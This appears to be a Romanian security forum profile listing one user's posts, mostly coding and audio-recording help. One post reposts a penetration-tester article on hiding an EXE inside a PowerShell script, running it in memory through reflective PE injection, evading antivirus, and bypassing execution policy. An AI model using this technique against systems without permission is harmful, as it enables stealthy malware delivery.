Jump to content


Active Members
  • Content count

  • Joined

  • Last visited

  • Days Won


gigiRoman last won the day on March 27

gigiRoman had the most liked content!

Community Reputation

102 Excellent

About gigiRoman

  • Rank
    Registered user
  • Birthday 02/05/77
  1. SoundRecorder pentru Windows 10

    Aici zice cum sa setezi: https://stackoverflow.com/a/17063026/3434918 Vezi ca pentru claritatea sunetului mai conteaza si bitdepth-ul. System parameters: sample rate: 44100, buffer milliseconds: 100, bit depth: 32. Prin modificarea acestor setari se va modifica si dimensiunea fisierului. Incearca asa. Din pacate, nu am cum sa incerc codul...
  2. SoundRecorder pentru Windows 10

    Calitatea inregistrarii: ai sample rate-ul setat pe 8000 cred, incearca sa il pui pe 44100. Implementare autostop: faci un timer care face dump in fisier la un interval de timp ales de tine.
  3. https://www.researchgate.net/publication/272508749_HTTP_Programming_Recipes_for_C_Bots HTTP Programming Recipes for C# Bots
  4. https://mytxt.xyz/python-hacking-the-no-nonsense-bundle-learn-python-programming-and-hacking-within-24-hours/
  5. SoundRecorder pentru Windows 10

    E posibil ca librariile sa nu mai fie compatibile. Am lucrat la o firma care facea un soft de voce si cand a trecut aplicatia pe win10 nu a mai functionat api-ul de la microsoft. Si am mutat pe naudio: https://github.com/naudio/NAudio Poti incerca proiectele demo de la el dc nu iti merge altfel. Da pm dc nu te descurci.
  6. Sursa: https://www.google.ro/amp/s/truesecdev.wordpress.com/2016/03/15/embedding-exe-files-into-powershell-scripts/amp/ Fabio Viggiani 2 years ago As sometimes happens, when you solve a particular problem, you realize that the solution can be generalized to cover more scenarios than the one you had in mind. This is one of those stories. I was trying to resolve an issue with creating a pure PowerShell payload as part of a client-side attack. Using PowerShell to run malicious code has many advantages, including: No need to install anything on the target. Very powerful engine underneath (e.g. you can directly invoke .NET code). You can use base64-encoded commands to obfuscate your evil commands, making the attack a little less obvious to spot. This is also a way to avoid escaping all the special characters, especially in advanced attacks involving several steps to deliver the payload. You can use Invoke-Expression to interpret strings as PowerShell commands. From a penetration tester’s perspective, this is very useful to avoid writing complex scripts on disk. For example, you can use PowerShell to download an additional (complex) script, and pipe it directly to Invoke-Expression, which will interpret and execute the downloaded script in memory, within the PowerShell process. This also avoid antivirus detection. The payload I wanted to run on the target included fairly complex functionalities. I had those functionalities as part of an EXE file. I didn’t want to drop the binary on the target system since it could potentially trigger an antivirus. I wanted to use PowerShell, but I didn’t want to rewrite the whole thing in PowerShell. So I came up with a solution. The objective is to embed a binary into a PowerShell script, and run it from within the script without writing it on disk. This is how the solution works: 1. Take your binary file and base64-encode it You can use the following function: function Convert-BinaryToString { [CmdletBinding()] param ( [string] $FilePath ) try { $ByteArray = [System.IO.File]::ReadAllBytes($FilePath); } catch { throw "Failed to read file. Ensure that you have permission to the file, and that the file path is correct."; } if ($ByteArray) { $Base64String = [System.Convert]::ToBase64String($ByteArray); } else { throw '$ByteArray is $null.'; } Write-Output -InputObject $Base64String; } 2. Create a new script with the following: The EXE converted to string created in point 1 The function Invoke-ReflectivePEInjection (part of the Powersploit project) Convert the string to byte array Call Invoke-ReflectivePEInjection So basically your binary is just a string in the PowerShell script. Once decoded as a byte array, the function Invoke-ReflectivePEInjection (part of the Powersploit project) will run it in memory within the PowerShell process. The final payload will look something like this: # Your base64 encoded binary $InputString = '...........' function Invoke-ReflectivePEInjection { ...... ...... ...... } # Convert base64 string to byte array $PEBytes = [System.Convert]::FromBase64String($InputString) # Run EXE in memory Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4" You can now run the script on the target like this: powershell -ExecutionPolicy Bypass -File payload.ps1 Depending on the binary you embedded, you might get the following error: PE platform doesn't match the architecture of the process it is being loaded in (32/64bit) To fix the issue, simply run the 32 bit PowerShell: %windir%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File payload.ps1 In the example below, I embedded plink.exe in payload.ps1 Pretty cool, uh?
  7. SoundRecorder pentru Windows 10

    soundRecorder.exe nu exista in system32? Dc nu e incearca sa il descarci. Cred ca Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe!App /FILE are legatura cu recorderul ala nou a lu Cortana si posibil sa fie prea prost sa fie apelat din linie de comanda.
  8. C/C++ — Manual Dll Injection | Manual Mapping

  9. Ajutor port forward

    Folosesti un proxy (server de comanda). Iti mai faci un client (client1) care sa fie pe aceeasi masina cu serverul NAT-uit. Ambii clienti se conecteaza la proxy. Cand clientul face un request la proxy, proxyul il fwdeaza catre client1 care face requestul pe localhost. Urmezi firul pentru response. Am mai facut scheme din astea pe tcp cu c# si mi-au iesit. Serverele nu erau http, erau in blana. Am incercat o schema: https://imgur.com/O4NInNY
  10. A lucrat cineva cu algoritmul RSA?

    Cred ca rsa e utila doar pt pki https://security.stackexchange.com/a/33445
  11. John Skeet ce zice? Tare topicul, chiar nu stiam: "This happens for example for auto generated properties, the yield keyword, lambda & anonymous functions/delegates, the new async keyword (the one that is introduced in the Async CTP and that will probably be present in C# 5.0)" "you are looking at a class that was automatically generated to implement closure semantics. My handy guide to interpreting the magic names that the C# compiler generates when it has to make something on your behalf is here: Where to learn about VS debugger 'magic names'" Sursa: https://stackoverflow.com/questions/7357525/empty-before-c-sharp-class-name https://stackoverflow.com/a/2509524
  12. Intrebare ascultare telefon

    POLIANDRÍE s. f. Formă de organizare a familiei (întâlnită astăzi numai la unele triburi primitive) în care o femeie are în același timp mai mulți soți. [Pr.: -li-an-] – Din fr. polyandrie.
  13. Intrebare ascultare telefon

  14. Ce carti mai cititi?

  15. Ajutor!!

    7500 lei a fost taxa la masterul de la Academia Tehnica Militara pe 1,5 ani. Lol.